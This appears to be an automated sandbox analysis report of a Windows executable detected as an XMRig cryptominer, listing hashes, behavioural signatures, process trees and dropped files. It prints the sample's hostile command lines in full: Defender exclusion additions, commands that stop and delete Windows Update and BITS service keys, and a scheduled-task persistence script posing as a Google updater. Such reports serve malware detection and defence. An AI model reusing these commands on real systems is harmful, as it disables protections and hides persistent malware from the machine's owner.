Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30-09-2022 16:06
Static task
static1
General
-
Target
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe
-
Size
4.0MB
-
MD5
9e2dccb45bffdc436741e88b0125cfba
-
SHA1
07ea0a692175a9a3c946263cb77fb8a328c8ebc1
-
SHA256
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3
-
SHA512
457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a
-
SSDEEP
49152:gT7yVPROZiO+S/+wpOBvfP35y8XVA1drVgfQi4V9XBVzc/4zQFFaNzzcICyxhouf:gT72P2irffhy8XV+ZiWzwiNzxOAukKr
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1816-185-0x00007FF755B30000-0x00007FF756324000-memory.dmp xmrig behavioral1/memory/1816-187-0x00007FF755B30000-0x00007FF756324000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 3616 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1816-185-0x00007FF755B30000-0x00007FF756324000-memory.dmp upx behavioral1/memory/1816-187-0x00007FF755B30000-0x00007FF756324000-memory.dmp upx -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 3616 set thread context of 4924 3616 updater.exe conhost.exe PID 3616 set thread context of 1816 3616 updater.exe dwm.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4220 sc.exe 3800 sc.exe 616 sc.exe 4348 sc.exe 2420 sc.exe 2380 sc.exe 3640 sc.exe 392 sc.exe 2832 sc.exe 2236 sc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedwm.exepid process 4092 powershell.exe 4092 powershell.exe 3872 powershell.exe 3872 powershell.exe 4388 powershell.exe 4388 powershell.exe 2076 powershell.exe 2076 powershell.exe 1844 powershell.exe 1844 powershell.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe 1816 dwm.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 644 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4092 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeIncreaseQuotaPrivilege 3872 powershell.exe Token: SeSecurityPrivilege 3872 powershell.exe Token: SeTakeOwnershipPrivilege 3872 powershell.exe Token: SeLoadDriverPrivilege 3872 powershell.exe Token: SeSystemProfilePrivilege 3872 powershell.exe Token: SeSystemtimePrivilege 3872 powershell.exe Token: SeProfSingleProcessPrivilege 3872 powershell.exe Token: SeIncBasePriorityPrivilege 3872 powershell.exe Token: SeCreatePagefilePrivilege 3872 powershell.exe Token: SeBackupPrivilege 3872 powershell.exe Token: SeRestorePrivilege 3872 powershell.exe Token: SeShutdownPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeSystemEnvironmentPrivilege 3872 powershell.exe Token: SeRemoteShutdownPrivilege 3872 powershell.exe Token: SeUndockPrivilege 3872 powershell.exe Token: SeManageVolumePrivilege 3872 powershell.exe Token: 33 3872 powershell.exe Token: 34 3872 powershell.exe Token: 35 3872 powershell.exe Token: 36 3872 powershell.exe Token: SeIncreaseQuotaPrivilege 3872 powershell.exe Token: SeSecurityPrivilege 3872 powershell.exe Token: SeTakeOwnershipPrivilege 3872 powershell.exe Token: SeLoadDriverPrivilege 3872 powershell.exe Token: SeSystemProfilePrivilege 3872 powershell.exe Token: SeSystemtimePrivilege 3872 powershell.exe Token: SeProfSingleProcessPrivilege 3872 powershell.exe Token: SeIncBasePriorityPrivilege 3872 powershell.exe Token: SeCreatePagefilePrivilege 3872 powershell.exe Token: SeBackupPrivilege 3872 powershell.exe Token: SeRestorePrivilege 3872 powershell.exe Token: SeShutdownPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeSystemEnvironmentPrivilege 3872 powershell.exe Token: SeRemoteShutdownPrivilege 3872 powershell.exe Token: SeUndockPrivilege 3872 powershell.exe Token: SeManageVolumePrivilege 3872 powershell.exe Token: 33 3872 powershell.exe Token: 34 3872 powershell.exe Token: 35 3872 powershell.exe Token: 36 3872 powershell.exe Token: SeIncreaseQuotaPrivilege 3872 powershell.exe Token: SeSecurityPrivilege 3872 powershell.exe Token: SeTakeOwnershipPrivilege 3872 powershell.exe Token: SeLoadDriverPrivilege 3872 powershell.exe Token: SeSystemProfilePrivilege 3872 powershell.exe Token: SeSystemtimePrivilege 3872 powershell.exe Token: SeProfSingleProcessPrivilege 3872 powershell.exe Token: SeIncBasePriorityPrivilege 3872 powershell.exe Token: SeCreatePagefilePrivilege 3872 powershell.exe Token: SeBackupPrivilege 3872 powershell.exe Token: SeRestorePrivilege 3872 powershell.exe Token: SeShutdownPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeSystemEnvironmentPrivilege 3872 powershell.exe Token: SeRemoteShutdownPrivilege 3872 powershell.exe Token: SeUndockPrivilege 3872 powershell.exe Token: SeManageVolumePrivilege 3872 powershell.exe Token: 33 3872 powershell.exe Token: 34 3872 powershell.exe Token: 35 3872 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.execmd.exepowershell.exeupdater.execmd.execonhost.execmd.exedescription pid process target process PID 4104 wrote to memory of 4092 4104 c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe powershell.exe PID 4104 wrote to memory of 4092 4104 c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe powershell.exe PID 4104 wrote to memory of 4464 4104 c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe cmd.exe PID 4104 wrote to memory of 4464 4104 c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe cmd.exe PID 4104 wrote to memory of 3872 4104 c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe powershell.exe PID 4104 wrote to memory of 3872 4104 c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe powershell.exe PID 4464 wrote to memory of 3640 4464 cmd.exe sc.exe PID 4464 wrote to memory of 3640 4464 cmd.exe sc.exe PID 4464 wrote to memory of 616 4464 cmd.exe sc.exe PID 4464 wrote to memory of 616 4464 cmd.exe sc.exe PID 4464 wrote to memory of 4348 4464 cmd.exe sc.exe PID 4464 wrote to memory of 4348 4464 cmd.exe sc.exe PID 4464 wrote to memory of 392 4464 cmd.exe sc.exe PID 4464 wrote to memory of 392 4464 cmd.exe sc.exe PID 4464 wrote to memory of 2832 4464 cmd.exe sc.exe PID 4464 wrote to memory of 2832 4464 cmd.exe sc.exe PID 4464 wrote to memory of 2960 4464 cmd.exe reg.exe PID 4464 wrote to memory of 2960 4464 cmd.exe reg.exe PID 4464 wrote to memory of 5112 4464 cmd.exe reg.exe PID 4464 wrote to memory of 5112 4464 cmd.exe reg.exe PID 4464 wrote to memory of 4488 4464 cmd.exe reg.exe PID 4464 wrote to memory of 4488 4464 cmd.exe reg.exe PID 4464 wrote to memory of 2584 4464 cmd.exe reg.exe PID 4464 wrote to memory of 2584 4464 cmd.exe reg.exe PID 4464 wrote to memory of 1216 4464 cmd.exe reg.exe PID 4464 wrote to memory of 1216 4464 cmd.exe reg.exe PID 4104 wrote to memory of 4388 4104 c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe powershell.exe PID 4104 wrote to memory of 4388 4104 c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe powershell.exe PID 4388 wrote to memory of 4340 4388 powershell.exe schtasks.exe PID 4388 wrote to memory of 4340 4388 powershell.exe schtasks.exe PID 3616 wrote to memory of 2076 3616 updater.exe powershell.exe PID 3616 wrote to memory of 2076 3616 updater.exe powershell.exe PID 3616 wrote to memory of 2720 3616 updater.exe cmd.exe PID 3616 wrote to memory of 2720 3616 updater.exe cmd.exe PID 3616 wrote to memory of 1844 3616 updater.exe powershell.exe PID 3616 wrote to memory of 1844 3616 updater.exe powershell.exe PID 2720 wrote to memory of 2420 2720 cmd.exe sc.exe PID 2720 wrote to memory of 2420 2720 cmd.exe sc.exe PID 2720 wrote to memory of 2236 2720 cmd.exe sc.exe PID 2720 wrote to memory of 2236 2720 cmd.exe sc.exe PID 2720 wrote to memory of 2380 2720 cmd.exe sc.exe PID 2720 wrote to memory of 2380 2720 cmd.exe sc.exe PID 2720 wrote to memory of 4220 2720 cmd.exe sc.exe PID 2720 wrote to memory of 4220 2720 cmd.exe sc.exe PID 2720 wrote to memory of 3800 2720 cmd.exe sc.exe PID 2720 wrote to memory of 3800 2720 cmd.exe sc.exe PID 2720 wrote to memory of 4968 2720 cmd.exe reg.exe PID 2720 wrote to memory of 4968 2720 cmd.exe reg.exe PID 2720 wrote to memory of 4868 2720 cmd.exe reg.exe PID 2720 wrote to memory of 4868 2720 cmd.exe reg.exe PID 2720 wrote to memory of 3092 2720 cmd.exe reg.exe PID 2720 wrote to memory of 3092 2720 cmd.exe reg.exe PID 2720 wrote to memory of 3288 2720 cmd.exe reg.exe PID 2720 wrote to memory of 3288 2720 cmd.exe reg.exe PID 2720 wrote to memory of 4536 2720 cmd.exe reg.exe PID 2720 wrote to memory of 4536 2720 cmd.exe reg.exe PID 3616 wrote to memory of 4924 3616 updater.exe conhost.exe PID 3616 wrote to memory of 4924 3616 updater.exe conhost.exe PID 3616 wrote to memory of 4924 3616 updater.exe conhost.exe PID 3616 wrote to memory of 4952 3616 updater.exe cmd.exe PID 3616 wrote to memory of 4952 3616 updater.exe cmd.exe PID 4924 wrote to memory of 4424 4924 conhost.exe cmd.exe PID 4924 wrote to memory of 4424 4924 conhost.exe cmd.exe PID 4952 wrote to memory of 4532 4952 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe"C:\Users\Admin\AppData\Local\Temp\c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ddxyuoslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe jmcfgycslfymn2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name3⤵
-
C:\Windows\system32\dwm.exeC:\Windows\system32\dwm.exe rhsgxdrgcnvokcze 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9ab2lSIri/mxz2RWaQYEWaHr+wsVwDrDaUmzhazyLU8bE+gbFvD2hyocZFBvGnOyRz2iSzhnZ7rBWrLxt5q36TsGIHyIiMTkfwiniXKP/hUp/fAVcT9dBT6tKiKkFF/MseV2⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58808750cf94934c2a6471ccc5f0b932a
SHA1dd1f5c5a7b725ecb0e4e96e0cebb62721e774dab
SHA256ffe821af02d97eeb40bca0f73c858296c854263a5477941c3bc4eb649289d69c
SHA51230b7e3f958621a284e95f2503daa1f5a0a10e01f18ed4e2ce9ebbba356a9d2a5bc4f15d3284863d405c24b9aa9181ec8cdf9def74a223a741aeb51d8190caa29
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5ebf3b98c64927b3ce0ea322a3aa2b6db
SHA1824c97b06cfa7b031c714a5564d76d10a5776cc7
SHA2564b0a2a3fcf13e3553cf37c04525be0487fbe2f4f257316bbc41ef29285cdb9d2
SHA5126e6e95607ce31abd66798a15639231ea23ddca6617967d7da1726bd3d78807d323713a2b55a24f07d82032a6d99587df8c63e6671bd6e2167a5bf9bad09290a1
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeFilesize
4.0MB
MD5d8b1e808045510a544b3bea75a4926e0
SHA1a54f9cab1b1ba331d713e320195a51eed5387f7e
SHA2561d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5
SHA512f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeFilesize
4.0MB
MD5d8b1e808045510a544b3bea75a4926e0
SHA1a54f9cab1b1ba331d713e320195a51eed5387f7e
SHA2561d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5
SHA512f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9
-
C:\Users\Admin\AppData\Roaming\Google\Libs\g.logFilesize
142B
MD5543c22e022ad2fe07e2fff6782b5842f
SHA1b0ce4f26371897a0f1a3460c14520adf3d665a69
SHA25662c97f684183ebec6c67e3cd5cb96e23435d07e0ef9687196b58a2da6d5de8a3
SHA512f33db332015bb84e8c31dd78af7511b761e8bf7946cd046b7190df1246f7ae646e5edaa1f47dae3f3137a80607697ec08b8d198438886e8a3c16f7e9dee83640
-
memory/392-142-0x0000000000000000-mapping.dmp
-
memory/616-140-0x0000000000000000-mapping.dmp
-
memory/1216-148-0x0000000000000000-mapping.dmp
-
memory/1816-191-0x000001A4329C0000-0x000001A4329E0000-memory.dmpFilesize
128KB
-
memory/1816-186-0x000001A432940000-0x000001A432960000-memory.dmpFilesize
128KB
-
memory/1816-185-0x00007FF755B30000-0x00007FF756324000-memory.dmpFilesize
8.0MB
-
memory/1816-184-0x000001A430F60000-0x000001A430F80000-memory.dmpFilesize
128KB
-
memory/1816-193-0x000001A4329C0000-0x000001A4329E0000-memory.dmpFilesize
128KB
-
memory/1816-192-0x000001A4329A0000-0x000001A4329C0000-memory.dmpFilesize
128KB
-
memory/1816-183-0x00007FF7563225D0-mapping.dmp
-
memory/1816-188-0x000001A4329A0000-0x000001A4329C0000-memory.dmpFilesize
128KB
-
memory/1816-189-0x000001A4329A0000-0x000001A4329C0000-memory.dmpFilesize
128KB
-
memory/1816-190-0x000001A4329A0000-0x000001A4329C0000-memory.dmpFilesize
128KB
-
memory/1816-187-0x00007FF755B30000-0x00007FF756324000-memory.dmpFilesize
8.0MB
-
memory/1844-176-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmpFilesize
10.8MB
-
memory/1844-170-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmpFilesize
10.8MB
-
memory/1844-162-0x0000000000000000-mapping.dmp
-
memory/2076-157-0x0000000000000000-mapping.dmp
-
memory/2076-159-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmpFilesize
10.8MB
-
memory/2076-160-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmpFilesize
10.8MB
-
memory/2236-165-0x0000000000000000-mapping.dmp
-
memory/2380-167-0x0000000000000000-mapping.dmp
-
memory/2420-164-0x0000000000000000-mapping.dmp
-
memory/2584-147-0x0000000000000000-mapping.dmp
-
memory/2720-161-0x0000000000000000-mapping.dmp
-
memory/2832-143-0x0000000000000000-mapping.dmp
-
memory/2960-144-0x0000000000000000-mapping.dmp
-
memory/3092-173-0x0000000000000000-mapping.dmp
-
memory/3288-174-0x0000000000000000-mapping.dmp
-
memory/3640-138-0x0000000000000000-mapping.dmp
-
memory/3800-169-0x0000000000000000-mapping.dmp
-
memory/3872-135-0x0000000000000000-mapping.dmp
-
memory/3872-149-0x00007FF82F640000-0x00007FF830101000-memory.dmpFilesize
10.8MB
-
memory/3872-150-0x00007FF82F640000-0x00007FF830101000-memory.dmpFilesize
10.8MB
-
memory/4092-163-0x00007FF82F640000-0x00007FF830101000-memory.dmpFilesize
10.8MB
-
memory/4092-132-0x0000000000000000-mapping.dmp
-
memory/4092-136-0x00007FF82F640000-0x00007FF830101000-memory.dmpFilesize
10.8MB
-
memory/4092-133-0x00000217AC160000-0x00000217AC182000-memory.dmpFilesize
136KB
-
memory/4220-168-0x0000000000000000-mapping.dmp
-
memory/4340-153-0x0000000000000000-mapping.dmp
-
memory/4348-141-0x0000000000000000-mapping.dmp
-
memory/4388-156-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmpFilesize
10.8MB
-
memory/4388-154-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmpFilesize
10.8MB
-
memory/4388-151-0x0000000000000000-mapping.dmp
-
memory/4424-179-0x0000000000000000-mapping.dmp
-
memory/4464-134-0x0000000000000000-mapping.dmp
-
memory/4488-146-0x0000000000000000-mapping.dmp
-
memory/4532-180-0x0000000000000000-mapping.dmp
-
memory/4536-175-0x0000000000000000-mapping.dmp
-
memory/4868-172-0x0000000000000000-mapping.dmp
-
memory/4924-177-0x00007FF6AB7B14E0-mapping.dmp
-
memory/4952-178-0x0000000000000000-mapping.dmp
-
memory/4968-171-0x0000000000000000-mapping.dmp
-
memory/5112-145-0x0000000000000000-mapping.dmp